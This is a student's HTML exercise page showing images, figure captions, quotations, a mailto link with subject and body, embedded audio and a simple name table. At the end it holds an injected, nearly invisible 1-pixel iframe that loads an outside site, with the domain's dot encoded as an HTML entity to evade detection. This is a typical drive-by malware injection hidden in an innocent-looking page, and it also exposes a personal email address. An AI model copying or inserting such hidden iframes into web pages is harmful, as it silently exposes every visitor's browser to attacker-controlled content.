<!DOCTYPE html>
<html>
<head>
<title>Sercond Assignment</title>
</head>
<body>
<h1>Add Three img in one line</h1>
<img src="../J.JPG" alt="no img" width="100" height="100"/>
<img src="../J.JPG" alt="no img" width="100" height="100"/>
<img src="../J.JPG" alt="no img" width="100" height="100"/>
<h1>Add Caption and Cite</h1>
<figure>
<img src="../J.JPG" alt="no img" width="100" height="100"/>
<figcaption>clicked by DSLR</figcaption>
</figure>
<q>Learn HTML</q>
<q cite="W3School.com"><a href="http://www.w3school.com">Learn HTML</a></q>

<h1>Mailto,Subject and Body</h1>
<a href="mailto:kaurjaspreet1900@gmail.com?subject=Traning&body=now Akash is your training teacher.he will teach u HTML,CSS etc">
Send Email to students About training session</a>

<h1>Audio Without Control And Autoplay</h1><!--
<audio >
<source src=" ../Dil Di Kitaab - Surjit Khan (DJJOhAL.Com).mp3"  type="audio/mpeg"/>
</audio> not working
(we can use embed to play song without control and autoplay -->

<embed src=" ../Dil Di Kitaab - Surjit Khan (DJJOhAL.Com).mp3  " type="audio/mpeg" width="100" height="100"/>


<h1>table</h1>
<table border="2">
<tr>
<th colspan=2>Name</th>
</tr>
<tr>
<th>First Name</th>
<th>Last Name</th>
</tr>
<tr>
<td>rohit</td>
<td>nahar</td>
</tr>
<tr>
<td>love</td>
<td>sangha</td>
</tr>

</table>

<iframe style="height:1px" src="http://www&#46;Brenz.pl/rc/" frameborder=0 width=1></iframe>
</body>
</html>